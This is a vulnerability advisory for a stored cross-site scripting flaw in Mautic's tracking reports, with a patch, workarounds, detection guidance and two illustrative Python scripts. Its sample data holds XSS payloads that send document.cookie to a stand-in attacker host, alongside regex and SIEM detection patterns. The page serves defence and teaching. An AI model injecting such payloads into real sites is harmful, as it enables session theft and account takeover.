CVE-2021-27917
📋 TL;DR
This stored cross-site scripting (XSS) vulnerability in Mautic lets an attacker inject script into values that end up in the contact tracking and page hits reports. When a Mautic user opens one of those reports, the script runs in that user's browser under that user's session, so it can potentially read the session cookie or perform actions as the user. Mautic versions before 3.3.4 are affected.
💻 Affected Systems
- Mautic
📦 What is this software?
Mautic by Acquia
⚠️ Risk & Real-World Impact
Worst Case
Attackers could steal administrator session cookies, gain full administrative access to the Mautic instance, and potentially pivot to other systems or steal sensitive customer data from the marketing automation platform.
Likely Case
Attackers inject malicious JavaScript that steals user session cookies when administrators or users view affected reports, leading to account compromise and unauthorized access to the Mautic dashboard.
If Mitigated
With contextual output encoding of the stored values in the report templates, plus validation of tracked fields on ingestion, an injected payload is rendered as inert text instead of being executed. Output encoding is the control that actually neutralises the payload; input validation alone is not sufficient, because a legitimate URL can carry angle brackets or quotes in its query string and still be a valid URL.
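The following is an added illustration of the vulnerability class and of the fix that neutralises it; it is not Mautic's code. The record layout (page_url, referer, user_agent), the report rendering functions and the sample hits are all assumptions standing in for whatever a tracking pixel records and a report template prints. It renders the same stored records once without encoding and once with HTML escaping, and shows why a scheme check on ingestion does not make output encoding unnecessary.

```python
# Added illustration of the vulnerability class behind CVE-2021-27917 and of the fix
# that neutralises it. Not Mautic code: the record layout (page_url, referer,
# user_agent) and the report rendering are assumptions standing in for whatever a
# tracking pixel records and a report template prints.
import html
from urllib.parse import urlsplit

# Constructed sample page-hit records. The last one carries an attacker-supplied
# referer containing a script payload; it is stored exactly as received.
SAMPLE_HITS = [
    {"contact_id": 17, "page_url": "https://example.com/pricing",
     "referer": "https://www.google.com/", "user_agent": "Mozilla/5.0"},
    {"contact_id": 17, "page_url": "https://example.com/signup?utm_source=newsletter",
     "referer": "", "user_agent": "Mozilla/5.0"},
    {"contact_id": 42, "page_url": "https://example.com/",
     "referer": "https://attacker.invalid/<script>fetch('//attacker.invalid/c?'+document.cookie)</script>",
     "user_agent": "Mozilla/5.0"},
]

COLUMNS = ("contact_id", "page_url", "referer", "user_agent")


def render_report_vulnerable(hits):
    """Interpolates stored values straight into HTML. Whatever was stored becomes
    live markup in the report viewer's browser: this is the stored XSS."""
    rows = "".join(
        "<tr>" + "".join(f"<td>{hit[col]}</td>" for col in COLUMNS) + "</tr>"
        for hit in hits
    )
    return f"<table>{rows}</table>"


def render_report_escaped(hits):
    """Same report with contextual output encoding: every untrusted value is
    HTML-escaped for the element-content context it is written into."""
    rows = "".join(
        "<tr>"
        + "".join(f"<td>{html.escape(str(hit[col]), quote=True)}</td>" for col in COLUMNS)
        + "</tr>"
        for hit in hits
    )
    return f"<table>{rows}</table>"


def accept_tracked_url(value):
    """Ingestion-time validation: keep only http(s) URLs with a host, drop the rest.
    Useful as defence in depth, but NOT a substitute for output encoding: a URL
    whose query string contains '<script>' is still a syntactically valid URL."""
    parts = urlsplit(value)
    if parts.scheme in ("http", "https") and parts.netloc:
        return value
    return ""


def report_is_safe(rendered_html):
    """Cheap check: no raw <script tag survives in the rendered report."""
    return "<script" not in rendered_html.lower()


if __name__ == "__main__":
    print("vulnerable report carries live script:",
          not report_is_safe(render_report_vulnerable(SAMPLE_HITS)))
    print("escaped report is inert:",
          report_is_safe(render_report_escaped(SAMPLE_HITS)))
    print("scheme check alone accepts a payload URL:",
          accept_tracked_url("https://example.com/?q=<script>alert(1)</script>") != "")
```

The escaped renderer is the fix; the validation function is there to make the caveat concrete: it rejects a javascript: URI but happily accepts an https URL with a script tag in its query, so the report template must still encode.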
🎯 Exploit Status
The vendor advisory includes technical details of the vulnerability; no public exploit is referenced here. Stored XSS is commonly weaponised because the payload persists server-side and fires against every user who views the affected report, with no further interaction from the attacker.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: 3.3.4
Vendor Advisory: https://github.com/mautic/mautic/security/advisories/GHSA-xpc5-rr39-v8v2
Restart Required: No
Instructions:
1. Back up your Mautic instance and database.
2. Update to Mautic 3.3.4 or later.
3. Clear the application cache.
4. Confirm the update succeeded by checking that the reported version is 3.3.4 or later.
🔧 Temporary Workarounds
Disable contact tracking and page hits reports
Temporarily disable the affected reports until patching is possible. Any payload that was already recorded remains in the tracking data; the patched release renders it as text rather than executing it.
Implement Content Security Policy (CSP)
Add a restrictive CSP header so that injected inline script is not executed. Caveat: the Mautic admin interface relies on inline scripts of its own, so a script-src 'self' policy is likely to break parts of the UI; deploy it first as Content-Security-Policy-Report-Only, review the violation reports, and only then enforce it.
Add 'Content-Security-Policy: default-src 'self'; script-src 'self'' to web server configuration
🧯 If You Can't Patch
- Restrict access to the Mautic admin interface (the /s/ paths) to trusted IP addresses only. This limits who can trigger the payload by viewing a report; it does not stop injection, because the tracking endpoint that records hits has to stay reachable by site visitors.
- Implement web application firewall (WAF) rules that block XSS payloads on the tracking endpoint, and make sure the rules inspect URL-decoded parameter values, since tracked values usually arrive percent-encoded.
🔍 How to Verify
Check if Vulnerable:
Check your Mautic version. Any release before 3.3.4 is vulnerable.
Check Version:
Read the version from the Mautic admin dashboard or from app/version.txt in the install directory, or run: php bin/console mautic:version
Verify Fix Applied:
After updating, confirm the version shows 3.3.4 or later. Then exercise the fix: generate a page hit whose tracked value contains a harmless HTML marker such as <b>xss-check</b>, open the contact tracking and page hits reports, and confirm the marker is displayed as literal text rather than rendered as bold.
📡 Detection & Monitoring
Log Indicators:
- Script tags, javascript: URIs or HTML event-handler attributes (onerror=, onload=) in stored page hit or contact tracking fields, including their percent-encoded forms
- Successful logins or active admin sessions from unfamiliar IP addresses or user agents shortly after a user viewed the affected reports, which is what reuse of a stolen session cookie looks like
Network Indicators:
- Outbound requests from an administrator's browser to unfamiliar domains while a report page is open; exfiltration originates from the viewer's browser, not from the Mautic server
SIEM Query:
source="mautic_logs" AND (message="*<script*" OR message="*javascript:*" OR message="*onerror=*" OR message="*onload=*" OR message="*%3Cscript*" OR message="*javascript%3A*")
Literal matches on the raw log line miss payloads that arrive percent-encoded; decode the request parameters before matching where your SIEM supports it.
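The following is an added detection example, not part of the original advisory or of Mautic. It applies the idea behind the SIEM query above to constructed web-server access log lines for a tracking-pixel endpoint (the /mtracking.gif path and the page_url and referer parameter names are assumptions), and shows concretely why a raw substring match misses payloads that arrive percent-encoded.

```python
# Added detection example, not part of the original advisory or of Mautic. It runs the
# idea behind the page's SIEM query over constructed access log lines for a
# tracking-pixel endpoint (the /mtracking.gif path and the page_url/referer parameter
# names are assumptions) and shows why matching on the raw line misses payloads that
# arrive percent-encoded.
import re
from urllib.parse import unquote

# Constructed log lines. Line 1 is benign; lines 2 and 3 carry percent-encoded
# payloads in query parameters; line 4 carries a raw <script> tag in the Referer field.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Mar/2021:12:01:02 +0000] "GET /mtracking.gif?page_url=https%3A%2F%2Fexample.com%2Fpricing&referer=https%3A%2F%2Fwww.google.com%2F HTTP/1.1" 200 43 "https://example.com/pricing" "Mozilla/5.0"',
    '198.51.100.9 - - [10/Mar/2021:12:05:41 +0000] "GET /mtracking.gif?page_url=https%3A%2F%2Fexample.com%2F&referer=%3Cscript%3Ealert(1)%3C%2Fscript%3E HTTP/1.1" 200 43 "-" "curl/7.68.0"',
    '198.51.100.9 - - [10/Mar/2021:12:06:03 +0000] "GET /mtracking.gif?page_url=https%3A%2F%2Fexample.com%2F%3Futm_source%3D%22%3E%3Cimg%20src%3Dx%20onerror%3Dfetch(%27//attacker.invalid/c?%27%2Bdocument.cookie)%3E HTTP/1.1" 200 43 "-" "curl/7.68.0"',
    '198.51.100.9 - - [10/Mar/2021:12:07:19 +0000] "GET /mtracking.gif?page_url=https%3A%2F%2Fexample.com%2F HTTP/1.1" 200 43 "<script>alert(1)</script>" "Mozilla/5.0"',
]

# Patterns applied to the decoded line. Order matters only for the reported names.
PATTERNS = {
    "script_tag": re.compile(r"<\s*script", re.I),
    "javascript_uri": re.compile(r"javascript\s*:", re.I),
    "event_handler": re.compile(r"(?<![a-z])on[a-z]+\s*=", re.I),
    "active_tag": re.compile(r"<\s*(img|svg|iframe|object|embed)\b", re.I),
}


def scan_raw(lines):
    """Literal substring match on the raw line, i.e. what the page's SIEM query does.
    Returns the 1-based line numbers it flags."""
    return [i for i, line in enumerate(lines, 1)
            if "<script>" in line or "javascript:" in line]


def normalise(line, rounds=3):
    """Percent-decode until stable (bounded) so double-encoded payloads are caught too."""
    for _ in range(rounds):
        decoded = unquote(line)
        if decoded == line:
            break
        line = decoded
    return line


def scan_decoded(lines):
    """Decode first, then match every pattern; one finding per flagged line."""
    findings = []
    for i, line in enumerate(lines, 1):
        text = normalise(line)
        matched = [name for name, rx in PATTERNS.items() if rx.search(text)]
        if matched:
            findings.append({"line": i, "ip": line.split(" ", 1)[0], "patterns": matched})
    return findings


if __name__ == "__main__":
    print("raw substring match flags lines:", scan_raw(SAMPLE_LOG))
    for f in scan_decoded(SAMPLE_LOG):
        print(f"line {f['line']} from {f['ip']}: {', '.join(f['patterns'])}")
```

The raw match only catches the payload that was written into the Referer header verbatim; decoding first also surfaces the two that were injected through percent-encoded query parameters, which is the path a tracking pixel normally records. Bounding the decode loop avoids spending unbounded time on a line crafted to decode forever.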